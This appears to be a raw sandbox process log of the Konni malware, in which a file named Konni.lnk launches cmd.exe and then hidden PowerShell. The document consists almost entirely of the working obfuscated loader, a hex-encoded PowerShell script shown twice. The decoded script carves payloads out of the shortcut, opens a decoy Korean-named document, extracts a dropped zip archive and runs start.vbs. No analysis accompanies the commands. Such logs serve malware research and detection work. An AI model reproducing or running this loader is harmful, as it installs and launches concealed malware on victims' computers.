cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IxthwxZtSPg" C:\Users\test22\AppData\Local\Temp\Konni.lnk
3060cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $wonders=\"`$temple='66756E6374696F6E2070436248536A72736F75714B282464637A507843774849634265524F297B244F64714F58736E67533D39353637333B2459426A615267657746437A3D244E756C6C3B666F72656163682824504E4F6650644D4D6A4D4C6969464820696E202464637A507843774849634265524F297B2459426A615267657746437A2B3D5B636861725D2824504E4F6650644D4D6A4D4C696946482D244F64714F58736E6753297D3B72657475726E202459426A615267657746437A7D3B24586B6A526F6C576A485853203D204765742D4C6F636174696F6E3B244B6A516B486A515056203D204765742D4368696C644974656D202D506174682024586B6A526F6C576A485853202D52656375727365202A2E6C6E6B207C2077686572652D6F626A656374207B245F2E6C656E677468202D657120307833343346433243397D207C2053656C6563742D4F626A656374202D457870616E6450726F70657274792046756C6C4E616D653B696628244B6A516B486A5150562E6C656E677468202D6571203029207B24586B6A526F6C576A485853203D2024656E763A54656D703B244B6A516B486A515056203D204765742D4368696C644974656D202D506174682024586B6A526F6C576A485853202D52656375727365202A2E6C6E6B207C2077686572652D6F626A656374207B245F2E6C656E677468202D657120307833343346433243397D207C2053656C6563742D4F626A656374202D457870616E6450726F70657274792046756C6C4E616D653B7D3B24586B6A526F6C576A485853203D2053706C69742D5061746820244B6A516B486A5150563B24696C4A42744C6956757078527A6664203D204E65772D4F626A6563742053797374656D2E494F2E46696C6553747265616D28244B6A516B486A5150562C205B53797374656D2E494F2E46696C654D6F64655D3A3A4F70656E2C205B53797374656D2E494F2E46696C654163636573735D3A3A52656164293B24696C4A42744C6956757078527A66642E5365656B28302C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B24696C4A42744C6956757078527A66642E5365656B28307830303030323643342C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B24656B53764E67496A5564574A68596746203D204E65772D4F626A65637420627974655B5D20307830303030433830303B24696C4A42744C6956757078527A66642E526561642824656B53764E67496A5564574A685967462C20302C2030783030303043383030293B246F7150736B4F756E74556D6E203D2024586B6A526F6C576A485853202B20275C27202B205B72656765785D3A3A756E65736361706528275C75414331305C75433831355C75443343395C75414330305C75303032305C75433245345C75433244435C75433544305C75303032305C75423533305C75423937385C75303032305C75443631315C75433837305C75303032305C75433534385C75423042345C75303032455C75303036385C75303037375C753030373027293B736320246F7150736B4F756E74556D6E2024656B53764E67496A5564574A68596746202D456E636F64696E6720427974653B2620246F7150736B4F756E74556D6E3B24696C4A42744C6956757078527A66642E5365656B28307830303030454543342C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B24485556506E466F7667614661756B64433D4E65772D4F626A65637420627974655B5D20307830303031343430303B24696C4A42744C6956757078527A66642E526561642824485556506E466F7667614661756B64432C20302C2030783030303134343030293B24696C4A42744C6956757078527A66642E436C6F736528293B52656D6F76652D4974656D202D5061746820244B6A516B486A515056202D466F7263653B246F657178734E7A736C3D24656E763A7075626C6963202B20275C27202B202732343537372E7A6970273B736320246F657178734E7A736C2024485556506E466F7667614661756B6443202D456E636F64696E6720427974653B24464F415575435954706C5772203D206E65772D6F626A656374202D636F6D207368656C6C2E6170706C69636174696F6E3B24446867764E66656D5876524E46664657203D2024464F415575435954706C57722E4E616D65737061636528246F657178734E7A736C293B24464F415575435954706C57722E4E616D6573706163652824656E763A7075626C6963202B20275C27202B2027646F63756D656E747327292E436F7079486572652824446867764E66656D5876524E466646572E6974656D7328292C203130343429207C206F75742D6E756C6C3B72656D6F76652D6974656D202D7061746820246F657178734E7A736C202D666F7263653B244A696C67694D485A53423D24656E763A7075626C69632B275C646F63756D656E74735C73746172742E766273273B2620244A696C67694D485A53423B';`$martin='';for(`$i=0;`$i -le `$temple.Length-2;`$i=`$i+2){`$Sorre=`$temple[`$i]+`$temple[`$i+1];`$martin= `$martin+[char]([convert]::toint16(`$Sorre,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create(`$martin));\";Invoke-Command -ScriptBlock ([Scriptblock]::Create($wonders));
2228powershell.exe powershell -windowstyle hidden $wonders=\"`$temple='66756E6374696F6E2070436248536A72736F75714B282464637A507843774849634265524F297B244F64714F58736E67533D39353637333B2459426A615267657746437A3D244E756C6C3B666F72656163682824504E4F6650644D4D6A4D4C6969464820696E202464637A507843774849634265524F297B2459426A615267657746437A2B3D5B636861725D2824504E4F6650644D4D6A4D4C696946482D244F64714F58736E6753297D3B72657475726E202459426A615267657746437A7D3B24586B6A526F6C576A485853203D204765742D4C6F636174696F6E3B244B6A516B486A515056203D204765742D4368696C644974656D202D506174682024586B6A526F6C576A485853202D52656375727365202A2E6C6E6B207C2077686572652D6F626A656374207B245F2E6C656E677468202D657120307833343346433243397D207C2053656C6563742D4F626A656374202D457870616E6450726F70657274792046756C6C4E616D653B696628244B6A516B486A5150562E6C656E677468202D6571203029207B24586B6A526F6C576A485853203D2024656E763A54656D703B244B6A516B486A515056203D204765742D4368696C644974656D202D506174682024586B6A526F6C576A485853202D52656375727365202A2E6C6E6B207C2077686572652D6F626A656374207B245F2E6C656E677468202D657120307833343346433243397D207C2053656C6563742D4F626A656374202D457870616E6450726F70657274792046756C6C4E616D653B7D3B24586B6A526F6C576A485853203D2053706C69742D5061746820244B6A516B486A5150563B24696C4A42744C6956757078527A6664203D204E65772D4F626A6563742053797374656D2E494F2E46696C6553747265616D28244B6A516B486A5150562C205B53797374656D2E494F2E46696C654D6F64655D3A3A4F70656E2C205B53797374656D2E494F2E46696C654163636573735D3A3A52656164293B24696C4A42744C6956757078527A66642E5365656B28302C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B24696C4A42744C6956757078527A66642E5365656B28307830303030323643342C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B24656B53764E67496A5564574A68596746203D204E65772D4F626A65637420627974655B5D20307830303030433830303B24696C4A42744C6956757078527A66642E526561642824656B53764E67496A5564574A685967462C20302C2030783030303043383030293B246F7150736B4F756E74556D6E203D2024586B6A526F6C576A485853202B20275C27202B205B72656765785D3A3A756E65736361706528275C75414331305C75433831355C75443343395C75414330305C75303032305C75433245345C75433244435C75433544305C75303032305C75423533305C75423937385C75303032305C75443631315C75433837305C75303032305C75433534385C75423042345C75303032455C75303036385C75303037375C753030373027293B736320246F7150736B4F756E74556D6E2024656B53764E67496A5564574A68596746202D456E636F64696E6720427974653B2620246F7150736B4F756E74556D6E3B24696C4A42744C6956757078527A66642E5365656B28307830303030454543342C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B24485556506E466F7667614661756B64433D4E65772D4F626A65637420627974655B5D20307830303031343430303B24696C4A42744C6956757078527A66642E526561642824485556506E466F7667614661756B64432C20302C2030783030303134343030293B24696C4A42744C6956757078527A66642E436C6F736528293B52656D6F76652D4974656D202D5061746820244B6A516B486A515056202D466F7263653B246F657178734E7A736C3D24656E763A7075626C6963202B20275C27202B202732343537372E7A6970273B736320246F657178734E7A736C2024485556506E466F7667614661756B6443202D456E636F64696E6720427974653B24464F415575435954706C5772203D206E65772D6F626A656374202D636F6D207368656C6C2E6170706C69636174696F6E3B24446867764E66656D5876524E46664657203D2024464F415575435954706C57722E4E616D65737061636528246F657178734E7A736C293B24464F415575435954706C57722E4E616D6573706163652824656E763A7075626C6963202B20275C27202B2027646F63756D656E747327292E436F7079486572652824446867764E66656D5876524E466646572E6974656D7328292C203130343429207C206F75742D6E756C6C3B72656D6F76652D6974656D202D7061746820246F657178734E7A736C202D666F7263653B244A696C67694D485A53423D24656E763A7075626C69632B275C646F63756D656E74735C73746172742E766273273B2620244A696C67694D485A53423B';`$martin='';for(`$i=0;`$i -le `$temple.Length-2;`$i=`$i+2){`$Sorre=`$temple[`$i]+`$temple[`$i+1];`$martin= `$martin+[char]([convert]::toint16(`$Sorre,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create(`$martin));\";Invoke-Command -ScriptBlock ([Scriptblock]::Create($wonders));
292